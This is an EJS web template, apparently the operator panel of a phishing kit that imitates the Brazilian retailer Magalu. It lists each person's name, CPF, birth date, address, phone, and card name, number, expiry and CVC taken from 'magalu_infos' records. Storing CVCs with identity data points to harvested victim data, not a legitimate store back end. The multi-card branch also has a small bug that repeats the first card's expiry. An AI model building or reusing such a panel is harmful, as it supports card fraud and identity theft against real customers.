<%
    function pad(d) {
        return (d < 10) ? '0' + d.toString() : d.toString();
    }
%>

<div class="row">
    <%- include('../errors/messages.ejs') %>
    <div class="col-md-12 justify-content-center bg-dark py-4 rounded">
        <div class="col-md-12 justify-content-center text-uppercase mx-auto text-center bg-primary text-light rounded-lg py-4 mb-4">
            Lista de dados
        </div>
        <div class="row table-responsive justify-content-center mx-auto ">
            <table class="table text-center table-hover table-striped">
                <thead>
                    <tr>
                        <th colspan="7">
                            Dados
                        </th>
                        <th colspan="4">
                            Cartões
                        </th>
                    </tr>
                    <tr>
                        <th>Nome</th>
                        <th>CPF</th>
                        <th>Data de nascimento</th>
                        <th>Endereço</th>
                        <th>Referência</th>
                        <th>CEP</th>
                        <th>Telefone</th>

                        <th>Nome do cartão</th>
                        <th>Número do cartão</th>
                        <th>Validade</th>
                        <th>CVC</th>
                    </tr>
                </thead>
                <tbody>
                    <% for (let i = 0; data.rows.length > i; i++) { %>
                        <tr>
                            <td><%= data.rows[i].full_name %></td>
                            <td><%= data.rows[i].cpf %></td>
                            <td><%= data.rows[i].birth_date %></td>
                            <td><%= `${data.rows[i].address}, ${data.rows[i].number} - ${data.rows[i].neighbourhood} - ${data.rows[i].city}/${data.rows[i].state}` %></td>
                            <td><%= data.rows[i].complement %></td>
                            <td><%= data.rows[i].zipcode %></td>
                            <td><%= data.rows[i].telephone %></td>
                            <% if (typeof data.rows[i].magalu_infos !== 'undefined') { %>
                                <% if (Object.keys(data.rows[i].magalu_infos).length === 1) { %>
                                    <td><%= data.rows[i].magalu_infos[0].cardname %></td>
                                    <td><%= data.rows[i].magalu_infos[0].cardnumber %></td>
                                    <td><%= `${pad(data.rows[i].magalu_infos[0].expiration_month)}/${data.rows[i].magalu_infos[0].expiration_year}` %></td>
                                    <td><%= data.rows[i].magalu_infos[0].cvc %></td>
                                <% } else if (Object.keys(data.rows[i].magalu_infos).length > 1) { %>
                                    <% let cardname = [] %>
                                    <% let cardnumber = [] %>
                                    <% let expiration = [] %>
                                    <% let cvc = [] %>
                                    <% for (let j = 0; j < Object.keys(data.rows[i].magalu_infos).length; j++) { %>
                                        <% cardname.push(data.rows[i].magalu_infos[j].cardname) %>
                                        <% cardnumber.push(data.rows[i].magalu_infos[j].cardnumber) %>
                                        <% expiration.push(`${pad(data.rows[i].magalu_infos[0].expiration_month)}/${data.rows[i].magalu_infos[0].expiration_year}`) %>
                                        <% cvc.push(data.rows[i].magalu_infos[j].cvc) %>
                                    <% } %>
                                    <td>
                                        <% cardname.forEach(value => { %>
                                            <%= value %>
                                            <br>
                                        <% }); %>
                                    </td>
                                    <td>
                                        <% cardnumber.forEach(value => { %>
                                            <%= value %>
                                            <br>
                                        <% }); %>
                                    </td>
                                    <td>
                                        <% expiration.forEach(value => { %>
                                            <%= value %>
                                            <br>
                                        <% }); %>
                                    </td>
                                    <td>
                                        <% cvc.forEach(value => { %>
                                            <%= value %>
                                            <br>
                                        <% }); %>
                                    </td>
                                <% } else { %>
                                    <td></td>
                                    <td></td>
                                    <td></td>
                                    <td></td>
                                <% } %>
                            <% } %>
                        </tr>
                    <% } %>
                </tbody>
            </table>
            <%- include('../partials/pagination.ejs') %>
        </div>
    </div>
</div>